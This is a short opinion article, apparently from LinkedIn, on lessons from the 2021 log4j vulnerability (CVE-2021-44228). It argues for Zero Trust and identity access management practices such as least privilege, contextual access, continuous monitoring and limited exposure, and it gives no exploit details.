Zero Trust and Identity Access Management (IAM) in the context of log4j vulnerability
Log4j Zero Day Vulnerability (NIST Ref: https://nvd.nist.gov/vuln/detail/CVE-2021-44228) shook us back in late 2021. No one would have thought that such a commonly used utility library can be ill-used to perform remote code execution. The attacker makes use of this vulnerability to launch an attack, making the server used for logging to execute malicious code. An important point to note is that logging functionality could be a “trusted insider” hosted within the company’s network perimeters. Yet, this is leveraged for launching the attack. This calls for action bringing out the importance of Identity Access Management (IAM) and in particular Zero Trust in protecting the organization. It is not to say that if you have an IAM tooling or Zero Trust implemented, you are protected against attacks arising due to Log4j vulnerability. Here is the link to my article on Zero Trust for reference: https://www.linkedin.com/pulse/what-zero-trust-madhukeshwar-bhat-pmp-cism
Least privilege principle: User, application or device should be granted the least possible privilege, sufficient enough for carrying out the assigned tasks. This needs to be managed actively across the organization.
Contextual Access: Access to resources needs to be determined by the context. Depending on multiple factors, the system needs to determine whether to grant or deny access to the resources. For example, the user’s location, type of device used, when the request was made etc. could be such factors determining the context.
Continuous monitoring: Set up monitoring tools intelligent enough to trigger alters as well as the ability to feed into analytics engines to improve alerting mechanisms.
Limit exposure: The resource exposures need to be limited. For example: if URL access is not needed outside the company, then there is no need to expose the URL to the general public. In general, the design should be in such a way that the attack surface needs to be as minimum as possible.
Key lessons learnt is that- irrespective of where an access request is originated, this needs to undergo strong authentication and authorization. Just because it is an internal application, don’t bypass the critical security controls. Every security incident makes us vigilant. Irrespective of whether impacted by a cyber-attack or not, it is better to have the right security controls in place. Prevention is better than cure!